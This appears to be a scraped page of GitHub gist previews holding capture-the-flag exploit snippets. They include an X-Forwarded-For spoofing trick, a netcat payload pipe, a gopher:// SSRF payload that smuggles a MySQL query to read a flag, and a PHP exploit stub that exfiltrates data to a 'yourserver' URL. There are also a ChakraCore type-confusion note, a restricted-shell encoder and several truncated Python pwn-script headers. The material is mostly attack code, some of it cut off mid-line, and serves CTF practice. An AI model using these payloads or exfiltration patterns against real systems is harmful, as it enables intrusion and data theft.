Web100 asked us to connect to the website from 12 different IPs from different countries. Instead of using proxies, you could simply set the X-Forwarded-For
header to an IP from the required country. A list of country to IP mappings can be found at http://www.nirsoft.net/countryip/nl.html. After doinng it 12 times, it would return the flag
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
gopher://foo@[cafebabe.cf]@yolo.com:3306/A%48%00%00%01%85%a6%3f%20%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%34%73%74%33%72%5f%6f%76%33%72%6c%30%72%64%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%00%4c%01%00%00%03%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%63%61%73%74%28%30%78%35%30%34%62%30%33%30%34%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%61%30%30%30%30%30%30%36%37%36%39%36%64%36%64%36%35%35%66%36%36%36%63%36%31%36%37%20%61%73%20%62%69%6e%61%72%79%29%2c%20%72%70%61%64%28%66%6c%61%67%2c%20%31%30%30%2c%20%27%41%27%29%2c%20%63%61%73%74%28%30%78%35%30%34%62%30%31%30%32%31%65%30%33%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%34%30%30%30%30%30%30%36%34%30%30%30%30%30%30%30%61%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%30%36%37%36%39%36%64%36%64%36%35%35% |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
$target = 'http://127.0.0.1/'; | |
$exploit = 'http://yourserver:1337/exploit.php'; | |
$exfil = 'http://yourserver:1337/FLAG='; | |
function enc($s) { | |
$res = ''; | |
for ($i = 0; $i < strlen($s); $i++) { | |
$res .= '\\' . dechex(ord($s[$i])); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
from PIL import Image | |
from StringIO import StringIO | |
def get_flag_rgb(): | |
rgb = [] | |
flag = requests.get("https://cryptoengine.stillhackinganyway.nl/flag").content | |
for i in range(20, 480, 40): | |
rgb.append(pixel(flag, i)) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//////////////////////////////////////////////////////////////////////////// | |
// | |
// The vulnerability was that the following line of code could change the type of the | |
// underlying Array from JavascriptNativeIntArray to JavascriptArray: | |
// | |
// spreadableCheckedAndTrue = JavascriptOperators::IsConcatSpreadable(aItem) != FALSE; | |
// | |
// As can be seen in the provided .diff, the check for whether the type of the pDestArray has changed | |
// was removed. If the aItem then is not a JavascriptArray, the following code path is taken: | |
// else |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
m = { | |
'0' : '$[$?/$$]', | |
'1' : '$?', | |
'2' : '$[$?+$?]', | |
'3' : '$[$?+$?+$?]', | |
'4' : '$[$?+$?+$?+$?]', | |
'5' : '$[$?+$?+$?+$?+$?]', | |
'6' : '$[($?+$?+$?)*($?+$?)]', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys | |
import socket | |
import struct | |
import telnetlib | |
import time | |
import re | |
import string |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys | |
import socket | |
import struct | |
import telnetlib | |
import time | |
import re | |
import string |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
#coding: UTF-8 | |
import struct | |
import socket | |
import telnetlib | |
import sys | |
if len(sys.argv) > 1 and sys.argv[1] == "l": | |
print "=== local exploit" |
NewerOlder